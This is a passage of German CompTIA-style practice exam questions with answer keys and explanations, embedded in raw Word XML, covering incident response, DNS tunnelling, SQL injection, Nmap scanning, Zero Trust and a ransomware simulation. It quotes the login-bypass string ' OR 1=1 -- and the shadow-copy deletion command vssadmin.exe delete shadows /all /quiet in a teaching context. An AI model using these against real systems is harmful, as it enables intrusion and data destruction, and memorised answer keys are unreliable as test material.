Risiko geschäftskonform zu handhaben?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Den Risikostatus der Systeme sofort auf "Kritisch" belassen und die Server vom Netzwerk trennen, bis der IT-Betrieb nachgibt. B) Einen ungeplanten Penetrationstest (Red Teaming) auf den Legacy-Systemen durchführen, um dem IT-Betrieb die reale Ausnutzbarkeit zu beweisen. C) Eine formale Ausnahme (Exception) dokumentieren und kompensierende Kontrollen (Compensating Controls) wie strenge Netzwerk-Mikrosegmentierung und dedizierte IPS-Regeln implementieren. D) Den Patch ungeachtet der Warnungen des IT-Betriebs durchsetzen, um Compliance-Verstöße und Audit-Findings zu vermeiden.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Im modernen Vulnerability Management nach CS0-003 muss der Geschäftsbetrieb zwingend aufrechterhalten werden. Wenn Patches technisch nicht anwendbar sind (Inhibitors to Remediation), muss das Risiko formal dokumentiert und von der Geschäftsführung akzeptiert werden (Exception Handling). Daraufhin müssen alternative Sicherheitsmaßnahmen, sogenannte kompensierende Kontrollen (z. B. Netzwerkisolierung, Host-based Firewalls, Intrusion Prevention System-Regeln), etabliert werden, um die Angriffsfläche auf ein akzeptables Maß zu reduzieren.</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Option D gefährdet die Verfügbarkeit (Availability) des Unternehmens inakzeptabel. Option B ist hochgradig riskant und könnte das instabile SCADA-System abstürzen lassen.</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Frage ID: CYS-003 (Domäne: 3.0 Incident Response and Management)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Ein Analyst identifiziert eine aktive Ransomware-Infektion auf einem Fileserver. Der Verschlüsselungsprozess läuft gerade an. Gemäß dem NIST SP 800-61 Incident Response Lifecycle muss schnell gehandelt werden. Welcher Schritt muss als allererstes durchgeführt werden, um den Schaden zu begrenzen?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Eradication: Sofortiges Löschen der bösartigen ausführbaren Dateien vom Server. B) Recovery: Einspielen des letzten sauberen Backups aus der Cloud. C) Containment: Logisches Isolieren des Servers vom restlichen Netzwerk (z.B. Port-Shutdown am Switch). D) Post-Incident Activity: Schreiben eines detaillierten Berichts für das Management.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Nach der Identifikation (Detection and Analysis) einer Bedrohung ist das primäre Ziel die Eindämmung (Containment), um zu verhindern, dass sich die Ransomware lateral auf andere Netzsegmente oder Backupserver ausbreitet.</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Erst wenn der Host isoliert ist, kann mit der Bereinigung (Eradication, Option A) und Wiederherstellung (Recovery, Option B) begonnen werden. Ein sofortiges Einspielen von Backups auf ein nicht isoliertes, infiziertes System würde unweigerlich zur sofortigen Neuverschlüsselung der wiederhergestellten Daten führen.</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Frage ID: CYS-004 (Domäne: 1.0 Security Operations)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Ein Analyst untersucht Netzwerkprotokolle und stellt fest, dass ein interner Server alle fünf Minuten winzige DNS-TXT-Anfragen an eine externe, unbekannte Domain sendet. Die Antworten enthalten verschlüsselte Base64-Strings. Es findet kein regulärer Web-Traffic zu dieser IP statt. Welches Angreiferverhalten wird hier am wahrscheinlichsten beobachtet?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Ein Distributed Denial of Service (DDoS) Angriff gegen den externen DNS-Server. B) DNS Cache Poisoning zur Umleitung interner Benutzer. C) Command and Control (C2) Kommunikation über einen DNS-Tunneling-Kanal. D) Reguläre Zonenübertragungen (Zone Transfers) eines fehlkonfigurierten DNS-Servers.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Das beschriebene Muster – regelmäßige, kleine Anfragen mit verschlüsselten Payloads (Base64) in DNS-TXT-Records – ist ein klassischer Indikator für DNS-Tunneling. Angreifer nutzen das Domain Name System oft zur Kommunikation mit Command and Control (C2) Servern, da DNS-Traffic auf Unternehmensfirewalls fast immer ausgehend erlaubt ist und selten tiefgehend inspiziert wird.</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DDoS-Angriffe (Option A) würden gigantische Traffic-Volumina erzeugen. Zone Transfers (Option D) nutzen in der Regel TCP Port 53 und übertragen komplette Zonendateien, keine Base64-Strings im 5-Minuten-Takt.</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3: CompTIA PenTest+ (PT0-002) - Offensive Level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Fokus: Aktive Ausnutzung, Scoping, Tool-Nutzung, Report-Erstellung.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="444746"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="superscript"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">86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Frage ID: PEN-001 (Domäne: 3.0 Attacks and Exploits)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Während eines White-Box-Penetrationstests auf eine Webanwendung, die auf den verwundbaren(</w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0b57d0"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://owasp.org/www-project-juice-shop/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) basiert, fügt der Tester den String ' OR 1=1 -- in das Login-Feld ein und erhält sofortigen Administratorzugriff. Welcher Schwachstellentyp wurde hier ausgenutzt und wie sollte der Software-Entwickler dies im finalen Remediation-Report beheben?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Cross-Site Scripting (XSS); Behebung durch striktes Output Encoding und Content Security Policy (CSP). B) SQL Injection (SQLi); Behebung durch Parameterized Queries (Prepared Statements) im Backend. C) Cross-Site Request Forgery (CSRF); Behebung durch die Implementierung von Anti-CSRF-Tokens. D) Insecure Direct Object Reference (IDOR); Behebung durch Session-basierte Zugriffskontrollen auf Objekt-Ebene.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Der eingegebene String ist der klassische Lehrbuchfall eines SQL-Injection-Angriffs. Der einfache Anführungsstrich (') bricht aus dem erwarteten SQL-String der Datenbankabfrage aus, OR 1=1 erzeugt eine immer wahre Bedingung (Tautologie), und -- kommentiert den Rest der ursprünglichen Datenbankabfrage aus (z. B. die Passwortprüfung).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="444746"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="superscript"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">89</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dadurch wird die Authentifizierung komplett umgangen. Die effektivste, im PT0-002 verlangte Gegenmaßnahme bei der Softwareentwicklung ist die Verwendung von parametrisierten Abfragen (Parameterized Queries), bei denen die SQL-Befehle vom Benutzereingabecode strikt getrennt kompiliert und verarbeitet werden, sodass Benutzereingaben niemals als ausführbarer Code interpretiert werden können.</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Frage ID: PEN-002 (Domäne: 1.0 Planning and Scoping)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Ein Lead Penetration Tester wird beauftragt, die AWS-Cloud-Infrastruktur eines Neukunden zu testen. Der Tester plant, großflächige DDoS-Simulationen, intensive Nmap-Scans und Schwachstellenscans auf die EC2-Instanzen durchzuführen. Was ist die wichtigste juristische und prozedurale Maßnahme in der Scoping-Phase, bevor solche aktiven Tests in einer Public-Cloud-Umgebung gestartet werden?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Das Herunterladen und Verifizieren des neuesten Kali Linux Images für die virtuellen Maschinen. B) Die präzise Definition der Ziel-IP-Adressbereiche im Nmap-Script, um Out-of-Scope-Ziele zu vermeiden. C) Die Einhaltung der spezifischen Cloud-Provider-Richtlinien für Penetrationstests und die vertragliche Definition der Rules of Engagement (RoE). D) Der Erwerb eines gültigen TLS-Zertifikats für die Command-and-Control-Kommunikation.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Die PT0-002-Zertifizierung legt einen enormen Wert auf legale und ethische Compliance (Domain 1.0).</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Bei Third-Party-Hosted Services wie AWS, Azure oder GCP dürfen Penetrationstests nur im strikten Rahmen der "Rules of Engagement" (RoE) und der spezifischen Acceptable Use Policies (AUP) des Cloud-Providers durchgeführt werden. Oftmals sind DoS-Angriffe strikt verboten oder erfordern eine vorherige, explizite schriftliche Genehmigung des Providers, da solche Angriffe die geteilte, mandantenfähige Infrastruktur des Providers schädigen könnten.</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 Ein Verstoß hiergegen kann zu rechtlichen Konsequenzen und der sofortigen Sperrung der Kundeninfrastruktur führen.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Frage ID: PEN-003 (Domäne: 2.0 Information Gathering and Vulnerability Scanning)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Ein Penetrationstester führt eine aktive Aufklärungsphase (Reconnaissance) gegen ein Zielnetzwerk durch und möchte feststellen, welche Ports auf einem Webserver geöffnet sind, ohne dabei vom Intrusion Detection System (IDS) des Kunden aufgrund eines vollständigen TCP-Handshakes blockiert zu werden. Welcher Nmap-Scan-Typ sollte verwendet werden?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nmap -sT (TCP Connect Scan) B) nmap -sU (UDP Scan) C) nmap -sS (TCP SYN Stealth Scan) D) nmap -O (OS Detection Scan)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Der TCP SYN Scan (-sS), oft als "Stealth Scan" bezeichnet, ist die Standardmethode, um IDS-Systemen zu entgehen und gleichzeitig schnell zu scannen.</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Der Scanner sendet ein SYN-Paket. Antwortet das Ziel mit SYN-ACK, weiß der Tester, dass der Port offen ist. Der Scanner sendet dann jedoch sofort ein RST (Reset) Paket, anstatt den Handshake mit einem ACK abzuschließen. Da der Handshake nie vollendet wird, protokollieren viele ältere oder einfach konfigurierte Firewalls/Anwendungen die Verbindung nicht.</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 Ein TCP Connect Scan (Option A) vollendet den Handshake und wird sehr wahrscheinlich protokolliert.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Frage ID: PEN-004 (Domäne: 4.0 Reporting and Communication)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Nach Abschluss eines erfolgreichen Penetrationstests präsentiert das Team die Ergebnisse vor dem Vorstand (C-Level Management). Wie sollte die Struktur und Tonalität der Präsentation für dieses spezifische Publikum gestaltet sein?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Fokus auf hochdetaillierte Code-Auszüge, um die technischen Fähigkeiten des Red Teams zu beweisen. B) Eine chronologische Auflistung aller verwendeten Nmap-Befehle und Metasploit-Module. C) Ein Executive Summary, das sich auf das Geschäftsrisiko, finanzielle Auswirkungen und strategische Mitigationsstrategien konzentriert. D) Fokus auf die Identifikation individueller Administratoren, die für die Fehlkonfigurationen verantwortlich sind, um Rechenschaftspflicht zu demonstrieren.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Die Kommunikationstechniken in Domäne 4.0 verlangen eine zielgruppengerechte Berichterstattung. Das C-Level-Management hat in der Regel keinen technischen Hintergrund, sondern entscheidet über Budgets und strategische Risiken.</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 Die Präsentation muss daher ein Executive Summary enthalten, das technische Schwachstellen in geschäftliche Risiken (z.B. Reputationsverlust, DSGVO-Strafen, Betriebsstillstand) übersetzt und den Return on Investment (ROI) von Gegenmaßnahmen aufzeigt.</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 Technisches Finger-Pointing (Option D) ist unethisch und kontraproduktiv für die Sicherheitskultur.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4: CompTIA SecurityX (CAS-005) - Expert Level (inkl. PBQ-Design)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Fokus: Strategische Architektur, Krypto-Design, Zero Trust, Incident Orchestration, komplexe GRC-Anforderungen.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Frage ID: CAS-001 (Multiple Choice - Domäne: 2.0 Security Architecture - 27 %)</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Ein multinationaler Logistikkonzern mit einer historisch gewachsenen, flachen Netzwerkarchitektur wurde kürzlich Opfer eines verheerenden Ransomware-Angriffs, der sich ungehindert lateral über alle globalen Niederlassungen verbreiten konnte. Der CISO beauftragt Sie als Senior Security Architect, ein komplettes Redesign der Architektur zu entwerfen. Das neue Design muss laterale Bewegungen physisch und logisch stoppen, auf dem Prinzip "Never trust, always verify" basieren und identitätsbasierte Zugriffsrichtlinien für jede einzelne Applikations-Workload in Echtzeit durchsetzen. Welches Architekturmodell und welche technische Implementierung setzen Sie ein?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Perimeter-based Security mit einer robusten Next-Generation Firewall (NGFW) am zentralen Internet-Gateway und Endpoint Detection and Response (EDR) auf allen Clients. B) Zero Trust Architecture (ZTA) unter Einsatz von Software-Defined Networking (SDN) für Mikrosegmentierung und einer zentralen Policy Decision Point (PDP) Engine für kontextbasierte Authentifizierung. C) Defense-in-Depth durch Implementierung eines stark regulierten Demilitarisierten Netzwerks (DMZ), Intrusion Detection Systems (IDS) und portbasierter VLANs für jede Etage des Hauptgebäudes. D) Ein Air-Gapped-Network für alle kritischen Systeme, das über ein dediziertes MPLS-Netzwerk ohne jegliche Internetverbindung operiert und ausschließlich IPSec-VPNs nutzt.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Das Szenario fordert explizit die Unterbindung lateraler Bewegungen, das Prinzip "Never trust, always verify" und identitätsbasierte Workload-Richtlinien. Diese Kriterien definieren punktgenau die Zero Trust Architecture (ZTA) nach NIST SP 800-207.</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Mikrosegmentierung auf Ebene der einzelnen Anwendungen (Workloads), oft realisiert durch Software-Defined Networking (SDN), isoliert infizierte Segmente effektiv und verhindert das Ausbreitungsmuster historischer Angriffe wie WannaCry oder Target.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Ein Policy Decision Point (PDP) wertet kontinuierlich Identität, Gerätezustand und Kontext aus, bevor Zugriff gewährt wird.</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Optionen A und C beschreiben traditionelle, perimeterfokussierte Modelle, die nach einem erfolgreichen initialen Einbruch (z.B. durch Phishing) keine laterale Ausbreitung im internen, historisch "vertrauenswürdigen" Netzwerk verhindern können. Option D ist für ein modernes Logistikunternehmen operativ unmöglich aufrechtzuerhalten.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Frage ID: CAS-002 (Multiple Choice - Domäne: 3.0 Security Engineering - 31 %)</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Ein globaler Finanzdienstleister verarbeitet extrem sensible, DSGVO-relevante Kundendaten in der Cloud. Die Data Scientists des Unternehmens müssen komplexe Machine-Learning-Modelle auf diesen Daten trainieren, um hochpräzise Betrugsmuster zu erkennen. Die Compliance-Abteilung fordert jedoch zwingend, dass der Cloud-Provider und selbst die Data Scientists zu keinem Zeitpunkt Zugriff auf die unverschlüsselten Rohdaten (Klartext) erhalten dürfen. Welche fortschrittliche kryptografische Technologie ermöglicht die Erfüllung dieser strikten Anforderungen?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Asymmetrische Kryptografie mittels RSA-4096 und Verwaltung der privaten Schlüssel durch Hardware Security Modules (HSM) vor Ort. B) Tokenisierung der Datenbankfelder gepaart mit Transparent Data Encryption (TDE) auf Speicherebene. C) Homomorphe Verschlüsselung (Homomorphic Encryption). D) Perfekte Vorwärtsgeheimhaltung (Perfect Forward Secrecy - PFS) mit Elliptic Curve Diffie-Hellman Ephemeral (ECDHE).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C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Die Kernanforderung lautet, dass mathematische Berechnungen (Machine Learning) an Daten durchgeführt werden müssen, ohne diese vorher jemals zu entschlüsseln. Dies ist der exakte Anwendungsfall für Homomorphe Verschlüsselung (Homomorphic Encryption).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Bei traditioneller Kryptografie (wie in Option A und B) müssen die Daten im Arbeitsspeicher der Cloud-Server (Data in Processing) entschlüsselt werden, um sinnvolle Berechnungen durchzuführen, wodurch sie kurzzeitig für Memory-Scraping-Malware oder böswillige Insider kompromittierbar wären. Option D schützt lediglich die Übertragung (Data in Transit) durch die Gewährleistung, dass kompromittierte Langzeitschlüssel keine vergangenen, aufgezeichneten Sitzungen gefährden, hilft aber nicht bei der Verarbeitung.</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Frage ID: CAS-003 (Multiple Choice - Domäne: 1.0 Governance, Risk and Compliance - 20 %)</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Während der Evaluation eines neuen SaaS-Anbieters für das kritische CRM-System stellt der Senior Security Engineer fest, dass der Anbieter im vergangenen Jahr Opfer eines Supply-Chain-Angriffs wurde (vergleichbar mit dem SolarWinds-Vorfall). Um das Restrisiko für das eigene Unternehmen belastbar zu quantifizieren und zu mindern, verlangt der Engineer detaillierten Einblick in die Sicherheitskontrollen des Anbieters. Welches Dokument bietet dem Security Engineer die tiefgreifendste, unabhängige Bestätigung der operativen Effektivität der IT-Sicherheitskontrollen des Drittanbieters über einen definierten Zeitraum? </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Optionen:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> A) Das ausgehandelte Service Level Agreement (SLA) inklusive Vertragsstrafen. B) Ein SOC 2 Type II Audit-Report (System and Organization Controls). C) Ein SOC 2 Type I Audit-Report. D) Die umfassende Software Bill of Materials (SBOM) der SaaS-Anwendung. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Isolierte Musterlösung:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> B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Ein SOC 2 Report bewertet IT-Dienstleister bezüglich der "Trust Services Criteria" (Sicherheit, Verfügbarkeit, Verarbeitungsintegrität, Vertraulichkeit, Datenschutz). Ein Type I Report (Option C) bewertet lediglich das Design der Kontrollen zu einem bestimmten </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Zeitpunkt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> und beweist nicht, dass diese auch gelebt werden. Ein Type II Report (Option B) hingegen evaluiert rigoros die </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">operative Effektivität</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> der Kontrollen über einen längeren </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Zeitraum</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (meist 6 bis 12 Monate) durch einen unabhängigen, externen Wirtschaftsprüfer.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Dies gibt dem Kunden die Garantie, dass Sicherheitsprozesse nicht nur auf dem Papier existieren. Die SBOM (Option D) listet zwar Software-Abhängigkeiten auf und ist wertvoll, prüft aber nicht die IT-Sicherheitsprozesse und das GRC-Framework des Anbieters.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Frage ID: CAS-PBQ-004 (Performance-Based Question / Simulation - Domäne: 4.0 Security Operations - 22 %)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Anmerkung zur Web-Integration: PBQs erfordern im Live-System physische Interaktion (Drag-and-Drop, CLI-Eingaben). Die Darstellung hier beschreibt das funktionale Design der Simulation.</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Szenario:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sie analysieren das hochauflösende Dashboard eines Security Orchestration, Automation, and Response (SOAR) Systems. Ein verknüpfter Alarm signalisiert eine kritische Anomalie: Ein Windows-Fileserver aus dem HR-VLAN kommuniziert unerwartet über Port 443 (HTTPS) mit einer unbekannten externen IP-Adresse, wobei die Datenmengen (Egress) stetig massiv ansteigen. Sie ziehen den PCAP-Dump und bemerken, dass das TLS-Zertifikat der Ziel-IP ungültig und selbstsigniert ist. Die Endpoint-Security-Lösung meldet zeitgleich, dass der Prozess vssadmin.exe delete shadows /all /quiet auf dem betroffenen Server mit administrativen Rechten ausgeführt wurde. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Aufgabenstellung:</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Klassifizieren Sie den exakten Angriffstyp basierend auf den Indikatoren.</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Wählen Sie aus der Liste der verfügbaren SOAR-Aktionen die nächsten </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zwei</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> zwingenden, sequenziellen Incident-Response-Schritte aus, um den Vorgang zu stoppen und Beweise zu sichern.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Daten-Elemente (Drop-Downs):</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Angriffstyp:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> A) DDoS Amplification, B) Ransomware mit Data Exfiltration (Double Extortion), C) SQL Injection Payload, D) Cryptojacking</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Aktionen:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> A) Lösegeldzahlung über Cryptocurrency-Wallet autorisieren, B) Server logisch vom Netzwerk isolieren (Network Containment via Switch-Port-Shutdown), C) Server physisch vom Stromnetz trennen, um den RAM zu leeren, D) Forensisches Image des RAMs und der Festplatte erstellen (Evidence Collection), E) Letztes Backup sofort auf den laufenden Server einspielen, um die Verfügbarkeit wiederherzustellen.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Isolierte Musterlösung:</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Angriffstyp: B) Ransomware mit Data Exfiltration</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Aktionen: B) Server logisch vom Netzwerk isolieren, D) Forensisches Image des RAMs und der Festplatte erstellen </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wissenschaftliche Begründung:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Der CLI-Befehl vssadmin.exe delete shadows löscht die Windows-Schattenkopien (Volume Shadow Copies). Dies ist eine absolute Standardtechnik moderner Ransomware (z. B. WannaCry, Ryuk, Conti), um die lokale, schnelle Wiederherstellung der verschlüsselten Dateien zu verhindern.</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Der extrem hohe ausgehende Traffic über ein selbstsigniertes, unvertrauenswürdiges Zertifikat deutet auf Datenexfiltration hin, bevor die eigentliche Verschlüsselung gestartet wird – eine Taktik, die als "Double Extortion" bekannt ist (Erpressung durch Verschlüsselung </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">und</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Androhung der Datenveröffentlichung).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Gemäß dem Incident Response Lifecycle nach NIST SP 800-61 muss das System in der </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Containment</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-Phase umgehend logisch isoliert werden (Option B), um die weitere Datenexfiltration und eine laterale Ausbreitung im Netzwerk zu stoppen.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="444746"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="superscript"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">97</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
